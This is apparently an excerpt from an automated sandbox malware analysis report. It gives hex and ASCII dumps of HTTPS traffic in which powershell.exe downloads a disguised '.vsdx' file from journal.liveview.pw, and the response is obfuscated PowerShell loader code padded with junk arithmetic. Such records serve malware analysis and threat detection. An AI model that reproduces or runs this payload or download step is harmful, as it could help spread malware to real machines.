                                                                                                                                                                                                                                                      2024-12-21 20:04:40 UTC1369INData Raw: 31 45 33 39 6e 32 63 78 33 34 41 33 32 74 33 31 45 32 63 55 33 34 6c 33 31 68 33 35 50 32 63 65 33 34 72 33 32 6c 33 32 77 32 63 44 33 34 6d 33 32 77 33 34 75 32 63 48 33 35 79 33 30 55 33 38 44 32 63 61 33 34 6d 33 34 6b 33 32 71 32 63 5a 33 34 49 33 31 5a 33 39 4c 32 63 6c 33 34 65 33 35 73 33 39 4f 32 63 41 33 34 78 33 38 73 33 37 66 32 63 42 33 34 41 33 39 77 33 32 41 32 63 65 33 34 6f 33 39 6a 33 30 69 32 63 70 33 34 64 33 31 77 33 35 72 32 63 48 33 34 48 33 34 4f 33 34 63 32 63 61 33 34 42 33 31 4e 33 35 4c 32 63 51 33 34 43 33 38 65 33 32 4d 32 63 4d 33 34 56 33 35 65 33 31 7a 32 63 79 33 34 57 33 39 76 33 33 47 32 63 75 33 34 52 33 35 73 33 30 48 32 63 42 33 34 54 33 39 59 33 33 6c 32 63 44 33 34 42 33 32 41 33 33 77 32 63 4d 33 34 69 33 32 44 33
                                                                                                                                                                                                                                                      Data Ascii: 1E39n2cx34A32t31E2cU34l31h35P2ce34r32l32w2cD34m32w34u2cH35y30U38D2ca34m34k32q2cZ34I31Z39L2cl34e35s39O2cA34x38s37f2cB34A39w32A2ce34o39j30i2cp34d31w35r2cH34H34O34c2ca34B31N35L2cQ34C38e32M2cM34V35e31z2cy34W39v33G2cu34R35s30H2cB34T39Y33l2cD34B32A33w2cM34i32D3
                                                                                                                                                                                                                                                      2024-12-21 20:04:40 UTC1369INData Raw: 5a 33 36 47 32 63 4e 33 34 64 33 33 68 33 38 6b 32 63 59 33 34 6e 33 33 4b 33 39 7a 32 63 51 33 34 46 33 33 61 33 34 70 32 63 63 33 34 71 33 35 55 33 30 57 32 63 6e 33 34 63 33 33 6a 33 35 50 32 63 4b 33 34 78 33 33 54 33 37 74 32 63 62 33 34 58 33 33 4e 33 38 4d 32 63 6a 33 34 68 33 35 51 33 33 78 32 63 6a 33 34 51 33 33 49 33 34 4a 32 63 66 33 34 7a 33 33 42 33 31 46 32 63 55 33 34 6f 33 33 4b 33 35 4f 32 63 58 33 34 73 33 34 77 33 30 71 32 63 41 33 34 54 33 33 53 33 38 57 32 63 52 33 34 4b 33 34 76 33 39 50 32 63 4a 33 34 6e 33 35 4a 33 30 42 32 63 5a 33 34 78 33 33 50 33 35 69 32 63 70 33 34 63 33 34 47 33 39 4c 32 63 68 33 34 4c 33 33 72 33 32 6f 32 63 61 33 34 65 33 33 75 33 32 57 32 63 6e 33 34 46 33 35 57 33 32 6a 32 63 61 33 34 58 33 33 4c 33 35
                                                                                                                                                                                                                                                      Data Ascii: Z36G2cN34d33h38k2cY34n33K39z2cQ34F33a34p2cc34q35U30W2cn34c33j35P2cK34x33T37t2cb34X33N38M2cj34h35Q33x2cj34Q33I34J2cf34z33B31F2cU34o33K35O2cX34s34w30q2cA34T33S38W2cR34K34v39P2cJ34n35J30B2cZ34x33P35i2cp34c34G39L2ch34L33r32o2ca34e33u32W2cn34F35W32j2ca34X33L35
                                                                                                                                                                                                                                                      2024-12-21 20:04:40 UTC1369INData Raw: 33 36 42 32 63 77 33 34 7a 33 33 45 33 33 72 32 63 42 33 34 51 33 34 6b 33 30 53 32 63 67 33 34 70 33 33 41 33 34 46 32 63 51 33 34 41 33 33 48 33 37 77 32 63 64 33 34 72 33 34 41 33 30 69 32 63 5a 33 34 74 33 33 6e 33 33 66 32 63 46 33 34 47 33 33 55 33 36 50 32 63 4e 33 34 6c 33 33 6c 33 33 51 32 63 6d 33 34 45 33 35 49 33 33 73 32 63 57 33 34 6e 33 35 69 33 30 65 32 63 62 33 34 5a 33 33 4f 33 33 41 32 63 45 33 34 41 33 34 58 33 30 51 32 63 65 33 34 52 33 33 42 33 31 78 32 63 77 33 34 45 33 35 62 33 32 44 32 63 4d 33 34 59 33 33 6d 33 38 75 32 63 76 33 34 55 33 33 46 33 35 76 32 63 44 33 34 6b 33 33 53 33 37 4c 32 63 72 33 34 4f 33 33 5a 33 35 71 32 63 4a 33 34 57 33 33 47 33 39 41 32 63 65 33 34 6d 33 33 61 33 38 45 32 63 6a 33 34 45 33 33 6c 33 37 77
                                                                                                                                                                                                                                                      Data Ascii: 36B2cw34z33E33r2cB34Q34k30S2cg34p33A34F2cQ34A33H37w2cd34r34A30i2cZ34t33n33f2cF34G33U36P2cN34l33l33Q2cm34E35I33s2cW34n35i30e2cb34Z33O33A2cE34A34X30Q2ce34R33B31x2cw34E35b32D2cM34Y33m38u2cv34U33F35v2cD34k33S37L2cr34O33Z35q2cJ34W33G39A2ce34m33a38E2cj34E33l37w
                                                                                                                                                                                                                                                      2024-12-21 20:04:40 UTC1369INData Raw: 37 64 32 63 52 33 34 72 33 33 59 33 37 71 32 63 44 33 34 4e 33 33 61 33 35 4b 32 63 76 33 34 46 33 33 48 33 33 49 32 63 52 33 34 5a 33 33 47 33 35 52 32 63 55 33 34 54 33 35 45 33 33 48 32 63 73 33 34 57 33 35 71 33 30 6b 32 63 75 33 34 76 33 33 6c 33 37 65 32 63 78 33 34 6a 33 33 69 33 32 78 32 63 7a 33 34 5a 33 33 61 33 31 59 32 63 46 33 34 74 33 35 59 33 30 56 32 63 6a 33 34 42 33 33 64 33 39 77 32 63 6c 33 34 6b 33 33 75 33 36 4c 32 63 76 33 34 52 33 35 47 33 30 58 32 63 46 33 34 42 33 33 6b 33 36 76 32 63 42 33 34 6e 33 33 76 33 34 49 32 63 63 33 34 76 33 33 4d 33 31 4c 32 63 58 33 34 4a 33 35 49 33 32 72 32 63 79 33 34 69 33 33 4c 33 36 62 32 63 75 33 34 69 33 33 59 33 32 72 32 63 73 33 34 74 33 33 79 33 36 4b 32 63 41 33 34 61 33 33 6a 33 35 67 32
                                                                                                                                                                                                                                                      Data Ascii: 7d2cR34r33Y37q2cD34N33a35K2cv34F33H33I2cR34Z33G35R2cU34T35E33H2cs34W35q30k2cu34v33l37e2cx34j33i32x2cz34Z33a31Y2cF34t35Y30V2cj34B33d39w2cl34k33u36L2cv34R35G30X2cF34B33k36v2cB34n33v34I2cc34v33M31L2cX34J35I32r2cy34i33L36b2cu34i33Y32r2cs34t33y36K2cA34a33j35g2
                                                                                                                                                                                                                                                      2024-12-21 20:04:40 UTC1369INData Raw: 4a 32 63 52 33 34 4b 33 33 66 33 35 70 32 63 55 33 34 73 33 33 43 33 38 6c 32 63 74 33 34 49 33 34 52 33 30 49 32 63 47 33 34 73 33 33 4a 33 39 44 32 63 73 33 34 4b 33 34 4e 33 39 59 32 63 74 33 34 6b 33 33 58 33 38 41 32 63 51 33 34 56 33 35 71 33 31 4c 32 63 70 33 34 77 33 35 5a 33 33 65 32 63 58 33 34 4f 33 34 6b 33 39 77 32 63 56 33 34 65 33 33 65 33 37 6f 32 63 7a 33 34 67 33 34 75 33 38 6b 32 63 54 33 34 45 33 35 42 33 32 4f 32 63 78 33 34 57 33 35 52 33 30 77 32 63 57 33 34 6f 33 33 51 33 37 68 32 63 6e 33 34 65 33 33 5a 33 39 7a 32 63 43 33 34 72 33 34 76 33 38 77 32 63 6a 33 34 6d 33 33 6c 33 39 72 32 63 49 33 34 4e 33 35 69 33 33 4e 32 63 67 33 34 59 33 34 5a 33 30 4e 32 63 70 33 34 6d 33 33 67 33 37 4c 32 63 54 33 34 62 33 33 4f 33 34 54 32 63
                                                                                                                                                                                                                                                      Data Ascii: J2cR34K33f35p2cU34s33C38l2ct34I34R30I2cG34s33J39D2cs34K34N39Y2ct34k33X38A2cQ34V35q31L2cp34w35Z33e2cX34O34k39w2cV34e33e37o2cz34g34u38k2cT34E35B32O2cx34W35R30w2cW34o33Q37h2cn34e33Z39z2cC34r34v38w2cj34m33l39r2cI34N35i33N2cg34Y34Z30N2cp34m33g37L2cT34b33O34T2c
                                                                                                                                                                                                                                                      2024-12-21 20:04:40 UTC1369INData Raw: 32 63 51 33 34 6a 33 35 46 33 32 70 32 63 4f 33 34 79 33 35 79 33 33 54 32 63 47 33 34 75 33 33 67 33 32 4a 32 63 44 33 34 54 33 35 42 33 30 69 32 63 54 33 34 4f 33 33 64 33 31 74 32 63 79 33 34 79 33 35 71 33 33 56 32 63 4d 33 34 5a 33 33 48 33 38 71 32 63 46 33 34 70 33 33 66 33 35 69 32 63 6d 33 34 74 33 35 68 33 30 6a 32 63 68 33 34 4b 33 33 5a 33 37 74 32 63 41 33 34 50 33 33 6b 33 32 6c 32 63 77 33 34 6c 33 34 49 33 39 58 32 63 71 33 34 78 33 34 44 33 39 6e 32 63 4e 33 34 71 33 33 41 33 39 52 32 63 74 33 34 6b 33 33 64 33 33 6f 32 63 71 33 34 48 33 34 4e 33 39 52 32 63 50 33 34 79 33 33 57 33 39 4b 32 63 6d 33 34 53 33 33 42 33 31 49 32 63 70 33 34 6a 33 35 74 33 32 6a 32 63 4f 33 34 45 33 33 59 33 37 61 32 63 52 33 34 6b 33 34 7a 33 38 49 32 63 6c
                                                                                                                                                                                                                                                      Data Ascii: 2cQ34j35F32p2cO34y35y33T2cG34u33g32J2cD34T35B30i2cT34O33d31t2cy34y35q33V2cM34Z33H38q2cF34p33f35i2cm34t35h30j2ch34K33Z37t2cA34P33k32l2cw34l34I39X2cq34x34D39n2cN34q33A39R2ct34k33d33o2cq34H34N39R2cP34y33W39K2cm34S33B31I2cp34j35t32j2cO34E33Y37a2cR34k34z38I2cl
                                                                                                                                                                                                                                                      2024-12-21 20:04:40 UTC1369INData Raw: 63 6a 33 34 69 33 33 6d 33 32 63 32 63 42 33 34 4f 33 33 41 33 36 59 32 63 6f 33 34 46 33 34 4e 33 30 76 32 63 4b 33 34 57 33 34 46 33 39 6b 32 63 78 33 34 69 33 33 69 33 38 45 32 63 69 33 34 4f 33 34 46 33 39 44 32 63 53 33 34 42 33 35 67 33 33 76 32 63 6a 33 34 66 33 35 73 33 32 75 32 63 69 33 34 56 33 33 79 33 38 46 32 63 41 33 34 56 33 35 64 33 33 66 32 63 61 33 34 52 33 33 66 33 38 62 32 63 69 33 34 52 33 33 50 33 35 44 32 63 44 33 34 55 33 33 73 33 31 41 32 63 6b 33 34 53 33 33 45 33 32 56 32 63 63 33 34 6a 33 33 4a 33 33 7a 32 63 68 33 34 46 33 35 70 33 33 4a 32 63 4e 33 34 53 33 33 4d 33 36 6f 32 63 58 33 34 41 33 34 6b 33 38 63 32 63 46 33 34 44 33 34 64 33 39 52 32 63 69 33 34 65 33 33 56 33 33 41 32 63 6c 33 34 64 33 33 72 33 39 4f 32 63 6d 33
                                                                                                                                                                                                                                                      Data Ascii: cj34i33m32c2cB34O33A36Y2co34F34N30v2cK34W34F39k2cx34i33i38E2ci34O34F39D2cS34B35g33v2cj34f35s32u2ci34V33y38F2cA34V35d33f2ca34R33f38b2ci34R33P35D2cD34U33s31A2ck34S33E32V2cc34j33J33z2ch34F35p33J2cN34S33M36o2cX34A34k38c2cF34D34d39R2ci34e33V33A2cl34d33r39O2cm3
                                                                                                                                                                                                                                                      2024-12-21 20:04:40 UTC1369INData Raw: 62 33 34 74 33 33 6e 33 32 78 32 63 67 33 34 59 33 34 5a 33 39 55 32 63 72 33 34 75 33 35 63 33 31 56 32 63 47 33 34 79 33 33 64 33 34 54 32 63 51 33 34 64 33 33 52 33 36 42 32 63 4b 33 34 78 33 33 46 33 33 66 32 63 51 33 34 4e 33 34 61 33 30 6f 32 63 63 33 34 79 33 33 41 33 32 75 32 63 48 33 34 69 33 34 51 33 39 67 32 63 44 33 34 55 33 33 4c 33 38 73 32 63 56 33 34 66 33 33 77 33 31 42 32 63 67 33 34 42 33 33 67 33 34 47 32 63 4f 33 34 70 33 33 55 33 34 76 32 63 66 33 34 72 33 35 4b 33 31 64 32 63 6f 33 34 48 33 33 67 33 35 54 32 63 78 33 34 6b 33 33 73 33 37 74 32 63 74 33 34 69 33 33 4e 33 32 59 32 63 68 33 34 77 33 33 51 33 39 76 32 63 52 33 34 5a 33 34 67 33 39 66 32 63 42 33 34 44 33 33 7a 33 38 50 32 63 68 33 34 54 33 35 5a 33 33 6e 32 63 64 33 34
                                                                                                                                                                                                                                                      Data Ascii: b34t33n32x2cg34Y34Z39U2cr34u35c31V2cG34y33d34T2cQ34d33R36B2cK34x33F33f2cQ34N34a30o2cc34y33A32u2cH34i34Q39g2cD34U33L38s2cV34f33w31B2cg34B33g34G2cO34p33U34v2cf34r35K31d2co34H33g35T2cx34k33s37t2ct34i33N32Y2ch34w33Q39v2cR34Z34g39f2cB34D33z38P2ch34T35Z33n2cd34


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      1192.168.11.2049755104.21.37.1734438336C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-12-21 20:04:47 UTC80OUTGET /singl6.vsdx HTTP/1.1
                                                                                                                                                                                                                                                      Host: journal.liveview.pw
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      2024-12-21 20:04:47 UTC981INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 21 Dec 2024 20:04:47 GMT
                                                                                                                                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                      Content-Length: 10676100
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      X-Powered-By: Express
                                                                                                                                                                                                                                                      ETag: W/"a2e784-rvlBQ2QbU230PMdhjioter3dS9Y"
                                                                                                                                                                                                                                                      Set-Cookie: connect.sid=s%3ArFOouH3pTqmd6DVT_m-Oi-d75u0JyhK5.YvQonvgm1bg4RzyvYO8Lkk0uMOufno9Oj4D8hikE1tc; Path=/; HttpOnly
                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dDvfbJJG5OYQoPrzsDZNjeXlAAtnBYdUbFbXaSakLV6L%2B24nJGJLPNYh6iH7MjStJhjXjBF0gJLsKqvHZR046ww1WFwD2d7Hn4i8CPfGnarJ2hwlLvYm38GnrmpLiFP0GlIpTSQP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                      CF-RAY: 8f5a7bb53b86d9bd-MIA
                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=129372&min_rtt=128930&rtt_var=27873&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2822&recv_bytes=694&delivery_rate=29393&cwnd=252&unsent_bytes=0&cid=d9b746cc03dfef88&ts=636&x=0"
                                                                                                                                                                                                                                                      2024-12-21 20:04:47 UTC388INData Raw: 24 4f 53 39 4c 76 4d 71 72 52 37 30 59 58 6a 42 57 42 73 7a 53 58 7a 56 35 6f 4d 6e 42 33 6b 58 69 67 31 74 53 4f 6b 4c 73 71 65 77 46 35 62 64 4f 4a 35 6b 6d 59 54 53 62 34 76 79 49 4e 42 4a 50 42 6f 38 43 53 50 57 42 48 50 54 69 31 36 53 7a 42 30 65 4f 4c 58 44 47 43 6b 61 4c 55 30 61 45 55 32 55 79 51 42 73 51 7a 36 76 6a 61 4e 4c 75 66 30 53 6e 57 4d 6c 70 32 73 52 7a 37 39 36 42 48 55 4f 65 31 77 34 66 30 42 42 78 33 4a 6b 41 6f 43 67 70 6b 73 67 63 30 74 4f 61 77 32 33 46 69 35 58 54 4a 38 36 39 39 4d 64 4c 66 77 70 39 54 32 6c 42 67 5a 5a 6a 74 4d 65 73 6f 56 4f 36 43 6e 4a 73 73 75 58 42 6b 6c 43 61 55 36 79 45 70 49 48 47 6a 4e 57 7a 45 52 4f 78 68 42 38 6e 44 55 4a 42 44 73 36 44 64 37 66 35 6e 67 43 65 51 37 61 42 49 70 46 6a 4a 6d 6f 63 70 66
                                                                                                                                                                                                                                                      Data Ascii: $OS9LvMqrR70YXjBWBszSXzV5oMnB3kXig1tSOkLsqewF5bdOJ5kmYTSb4vyINBJPBo8CSPWBHPTi16SzB0eOLXDGCkaLU0aEU2UyQBsQz6vjaNLuf0SnWMlp2sRz796BHUOe1w4f0BBx3JkAoCgpksgc0tOaw23Fi5XTJ8699MdLfwp9T2lBgZZjtMesoVO6CnJssuXBklCaU6yEpIHGjNWzEROxhB8nDUJBDs6Dd7f5ngCeQ7aBIpFjJmocpf
                                                                                                                                                                                                                                                      2024-12-21 20:04:47 UTC1369INData Raw: 50 59 56 4b 38 76 47 4f 4d 46 62 47 75 78 63 38 54 66 4a 61 64 68 58 61 65 71 58 31 6d 53 56 33 30 32 55 46 44 36 4b 30 79 68 45 58 42 42 52 51 34 6b 50 6a 53 6f 70 57 53 69 6b 6c 75 36 6b 6f 6b 52 6c 74 51 68 51 50 61 74 73 73 53 6b 76 52 4b 52 6d 47 61 68 73 36 4f 4d 61 6b 6f 66 79 46 49 42 52 36 39 6e 59 4c 4f 38 62 33 4f 46 50 35 50 42 52 6e 68 48 36 42 54 48 47 37 52 73 64 66 30 43 69 39 51 65 64 52 47 78 37 79 6b 59 62 79 44 69 72 72 54 6f 74 52 41 4a 6e 54 43 4f 6e 49 38 68 59 6d 45 48 52 59 6e 55 4b 74 33 69 75 58 5a 63 76 36 75 43 54 6e 6c 79 65 66 4a 61 4b 58 57 42 54 73 30 6d 33 6e 75 6f 45 49 4b 32 38 66 45 76 79 62 47 42 51 4f 69 6b 73 73 43 39 6e 55 70 6d 31 57 67 38 45 46 52 6c 30 35 6c 68 44 69 77 41 48 51 7a 54 61 4b 72 4f 48 4c 54 6a 67
                                                                                                                                                                                                                                                      Data Ascii: PYVK8vGOMFbGuxc8TfJadhXaeqX1mSV302UFD6K0yhEXBBRQ4kPjSopWSiklu6kokRltQhQPatssSkvRKRmGahs6OMakofyFIBR69nYLO8b3OFP5PBRnhH6BTHG7Rsdf0Ci9QedRGx7ykYbyDirrTotRAJnTCOnI8hYmEHRYnUKt3iuXZcv6uCTnlyefJaKXWBTs0m3nuoEIK28fEvybGBQOikssC9nUpm1Wg8EFRl05lhDiwAHQzTaKrOHLTjg
                                                                                                                                                                                                                                                      2024-12-21 20:04:47 UTC456INData Raw: 62 64 4f 4a 35 6b 6d 59 54 53 62 34 76 79 49 4e 42 4a 50 42 6f 38 43 53 50 57 42 48 50 54 69 31 36 53 7a 42 30 65 4f 4c 58 44 47 43 6b 61 4c 55 30 61 45 55 32 55 79 51 42 73 51 7a 36 76 6a 61 4e 4c 75 66 30 53 6e 57 4d 6c 70 32 73 52 7a 37 39 36 42 48 55 4f 65 31 77 34 66 30 42 42 78 33 4a 6b 41 6f 43 67 70 6b 73 67 63 30 74 4f 61 77 32 33 46 69 35 58 54 4a 38 36 39 39 4d 64 4c 66 77 70 39 54 32 6c 42 67 5a 5a 6a 74 4d 65 73 6f 56 4f 36 43 6e 4a 73 73 75 58 42 6b 6c 43 61 55 36 79 45 70 49 48 47 6a 4e 57 7a 45 52 4f 78 68 42 38 6e 44 55 4a 42 44 73 36 44 64 37 66 35 6e 67 43 65 51 37 61 42 49 70 46 6a 4a 6d 6f 63 70 66 38 30 4c 4d 44 58 6c 4d 77 6b 4c 6c 72 30 41 58 51 4f 49 35 58 79 6b 32 44 39 42 48 64 61 73 56 61 73 35 30 75 61 50 52 30 38 4a 6d 38 41
                                                                                                                                                                                                                                                      Data Ascii: bdOJ5kmYTSb4vyINBJPBo8CSPWBHPTi16SzB0eOLXDGCkaLU0aEU2UyQBsQz6vjaNLuf0SnWMlp2sRz796BHUOe1w4f0BBx3JkAoCgpksgc0tOaw23Fi5XTJ8699MdLfwp9T2lBgZZjtMesoVO6CnJssuXBklCaU6yEpIHGjNWzEROxhB8nDUJBDs6Dd7f5ngCeQ7aBIpFjJmocpf80LMDXlMwkLlr0AXQOI5Xyk2D9BHdasVas50uaPR08Jm8A
                                                                                                                                                                                                                                                      2024-12-21 20:04:47 UTC1369INData Raw: 65 64 52 47 78 37 79 6b 59 62 79 44 69 72 72 54 6f 74 52 41 4a 6e 54 43 4f 6e 49 38 68 59 6d 45 48 52 59 6e 55 4b 74 33 69 75 58 5a 63 76 36 75 43 54 6e 6c 79 65 66 4a 61 4b 58 57 42 54 73 30 6d 33 6e 75 6f 45 49 4b 32 38 66 45 76 79 62 47 42 51 4f 69 6b 73 73 43 39 6e 55 70 6d 31 57 67 38 45 46 52 6c 30 35 6c 68 44 69 77 41 48 51 7a 54 61 4b 72 4f 48 4c 54 6a 67 51 64 39 5a 6b 62 62 54 49 33 4c 35 44 46 72 6a 6b 67 45 72 4a 58 51 36 33 32 57 51 76 64 65 71 44 68 38 52 75 68 4c 58 58 48 46 7a 67 4b 54 45 69 4b 55 49 32 72 54 4e 70 4f 46 77 39 66 56 71 48 6f 54 49 71 34 37 43 54 6e 30 49 57 58 72 4b 4e 49 6c 32 64 37 70 35 57 6e 6b 64 43 67 52 63 4f 56 66 58 39 46 51 73 58 34 6a 6a 6f 32 76 6e 36 55 62 59 66 64 35 57 70 70 35 74 49 4d 65 74 37 4a 76 4a 50
                                                                                                                                                                                                                                                      Data Ascii: edRGx7ykYbyDirrTotRAJnTCOnI8hYmEHRYnUKt3iuXZcv6uCTnlyefJaKXWBTs0m3nuoEIK28fEvybGBQOikssC9nUpm1Wg8EFRl05lhDiwAHQzTaKrOHLTjgQd9ZkbbTI3L5DFrjkgErJXQ632WQvdeqDh8RuhLXXHFzgKTEiKUI2rTNpOFw9fVqHoTIq47CTn0IWXrKNIl2d7p5WnkdCgRcOVfX9FQsX4jjo2vn6UbYfd5Wpp5tIMet7JvJP
                                                                                                                                                                                                                                                      2024-12-21 20:04:47 UTC1369INData Raw: 59 57 65 20 3d 20 35 39 37 0d 0a 24 5a 4f 43 6d 6a 55 6a 44 50 53 66 20 3d 20 24 51 55 56 4d 4c 78 6b 49 68 43 74 0d 0a 24 55 44 6d 63 77 20 3d 20 24 4c 54 48 6e 53 4b 52 45 75 58 42 0d 0a 24 45 66 43 6f 51 58 6a 77 53 64 61 20 3d 20 28 28 28 32 30 2b 32 33 2d 28 24 55 52 64 6b 52 77 4a 47 4c 6d 76 53 68 2d 31 32 2d 28 24 55 44 6d 63 77 2d 31 2d 28 24 55 52 64 6b 52 77 4a 47 4c 6d 76 53 68 2d 32 38 2d 39 29 29 29 2d 24 55 73 66 4b 6f 71 50 6a 54 4e 2d 34 36 2b 34 33 29 29 29 0d 0a 73 77 69 74 63 68 28 28 33 2b 31 38 2b 24 6c 42 43 54 5a 4c 63 73 77 76 72 53 77 29 2d 28 33 34 2d 32 36 2d 24 5a 4f 43 6d 6a 55 6a 44 50 53 66 29 2d 28 33 37 2d 34 30 2d 34 29 29 7b 0d 0a 28 28 28 28 24 45 66 43 6f 51 58 6a 77 53 64 61 2d 31 36 2d 24 71 63 48 58 65 54 77 54 70
                                                                                                                                                                                                                                                      Data Ascii: YWe = 597$ZOCmjUjDPSf = $QUVMLxkIhCt$UDmcw = $LTHnSKREuXB$EfCoQXjwSda = (((20+23-($URdkRwJGLmvSh-12-($UDmcw-1-($URdkRwJGLmvSh-28-9)))-$UsfKoqPjTN-46+43)))switch((3+18+$lBCTZLcswvrSw)-(34-26-$ZOCmjUjDPSf)-(37-40-4)){(((($EfCoQXjwSda-16-$qcHXeTwTp
                                                                                                                                                                                                                                                      2024-12-21 20:04:47 UTC1369INData Raw: 4b 77 71 6c 4e 6b 76 55 20 3d 20 34 39 32 0d 0a 24 44 4b 45 69 58 6c 55 79 4b 67 50 20 3d 20 24 4f 72 4a 6d 70 45 4e 0d 0a 24 73 63 64 76 4e 52 72 20 3d 20 24 44 74 57 65 68 67 6f 77 49 6e 0d 0a 24 58 72 68 4e 7a 20 3d 20 24 4a 72 4f 67 46 75 76 49 44 0d 0a 24 55 48 58 46 59 20 3d 20 35 35 39 0d 0a 24 4a 59 45 73 61 46 51 44 66 7a 57 52 4b 43 20 3d 20 24 4f 72 4a 6d 70 45 4e 0d 0a 24 49 79 62 63 44 68 47 6d 6a 54 20 3d 20 36 0d 0a 24 4e 69 61 73 49 65 20 3d 20 28 28 28 28 28 31 39 2a 32 33 2a 33 35 29 29 2d 31 36 2d 32 2b 28 33 38 2b 32 33 2b 35 29 29 2d 28 31 34 38 37 39 29 29 29 0d 0a 24 4e 4d 45 47 52 6f 20 3d 20 28 28 28 28 28 33 31 2d 37 2a 31 32 29 2a 34 31 2a 31 30 2d 28 34 2d 34 37 2a 33 31 2a 34 37 2a 31 32 2a 32 32 29 29 2d 28 33 34 2a 33 35 2a
                                                                                                                                                                                                                                                      Data Ascii: KwqlNkvU = 492$DKEiXlUyKgP = $OrJmpEN$scdvNRr = $DtWehgowIn$XrhNz = $JrOgFuvID$UHXFY = 559$JYEsaFQDfzWRKC = $OrJmpEN$IybcDhGmjT = 6$NiasIe = (((((19*23*35))-16-2+(38+23+5))-(14879)))$NMEGRo = (((((31-7*12)*41*10-(4-47*31*47*12*22))-(34*35*
                                                                                                                                                                                                                                                      2024-12-21 20:04:47 UTC1369INData Raw: 53 59 2b 32 35 2d 28 39 2b 32 35 2d 35 29 2d 28 37 31 39 29 29 0d 0a 24 63 45 6a 54 6c 74 49 4d 58 69 41 43 20 3d 20 28 28 28 28 24 65 73 4b 77 71 6c 4e 6b 76 55 2d 31 2d 24 72 53 42 71 6e 53 6c 6b 4f 66 29 2d 28 24 4f 65 46 78 59 57 65 2d 34 39 2b 32 31 2b 32 31 2d 32 32 2b 24 4a 59 45 73 61 46 51 44 66 7a 57 52 4b 43 2d 28 28 24 51 55 56 4d 4c 78 6b 49 68 43 74 2d 34 32 2d 31 36 29 29 29 29 29 2b 28 35 39 37 29 29 0d 0a 24 50 6c 4c 79 6b 4a 77 78 43 44 5a 20 3d 20 28 28 28 28 31 2b 34 39 2b 32 39 29 29 29 2b 28 34 33 2d 31 32 2d 34 38 2b 34 35 2d 34 2d 28 24 6b 57 67 68 4f 74 75 5a 78 6e 53 65 68 51 2b 32 30 2d 34 38 29 29 2d 28 32 32 29 29 0d 0a 24 4f 65 52 75 67 76 6b 41 4d 45 20 3d 20 28 28 28 28 34 38 2b 33 34 2b 24 66 6f 68 75 6a 7a 6f 42 4d 57 29
                                                                                                                                                                                                                                                      Data Ascii: SY+25-(9+25-5)-(719))$cEjTltIMXiAC = (((($esKwqlNkvU-1-$rSBqnSlkOf)-($OeFxYWe-49+21+21-22+$JYEsaFQDfzWRKC-(($QUVMLxkIhCt-42-16)))))+(597))$PlLykJwxCDZ = ((((1+49+29)))+(43-12-48+45-4-($kWghOtuZxnSehQ+20-48))-(22))$OeRugvkAME = ((((48+34+$fohujzoBMW)
                                                                                                                                                                                                                                                      2024-12-21 20:04:47 UTC1369INData Raw: 63 4b 45 68 59 20 3d 20 28 28 28 28 32 34 2d 31 36 2b 24 4e 4d 45 47 52 6f 29 29 29 2b 24 45 66 43 6f 51 58 6a 77 53 64 61 2b 34 34 2d 32 35 2b 28 28 34 38 2d 32 34 2b 28 24 7a 79 51 67 67 2d 33 39 2b 32 37 29 29 29 2b 31 33 2b 39 2b 31 31 2b 28 31 35 39 33 29 29 0d 0a 24 51 5a 53 64 66 6f 45 4a 57 63 74 20 3d 20 28 28 28 28 31 38 2d 31 30 2b 32 29 2b 24 71 63 48 58 65 54 77 54 70 78 65 63 46 2b 36 2b 31 31 29 29 2d 24 61 4a 56 63 75 74 52 68 72 50 45 2d 34 35 2b 24 6c 42 43 54 5a 4c 63 73 77 76 72 53 77 2d 24 45 66 43 6f 51 58 6a 77 53 64 61 2d 32 37 2d 24 55 44 6d 63 77 2b 31 39 2d 32 2d 31 33 2d 28 32 35 30 38 29 29 0d 0a 24 57 4e 64 69 52 6c 52 41 20 3d 20 28 28 28 28 34 30 2b 32 38 2b 24 4a 59 45 73 61 46 51 44 66 7a 57 52 4b 43 29 29 2b 24 79 53 6f
                                                                                                                                                                                                                                                      Data Ascii: cKEhY = ((((24-16+$NMEGRo)))+$EfCoQXjwSda+44-25+((48-24+($zyQgg-39+27)))+13+9+11+(1593))$QZSdfoEJWct = ((((18-10+2)+$qcHXeTwTpxecF+6+11))-$aJVcutRhrPE-45+$lBCTZLcswvrSw-$EfCoQXjwSda-27-$UDmcw+19-2-13-(2508))$WNdiRlRA = ((((40+28+$JYEsaFQDfzWRKC))+$ySo
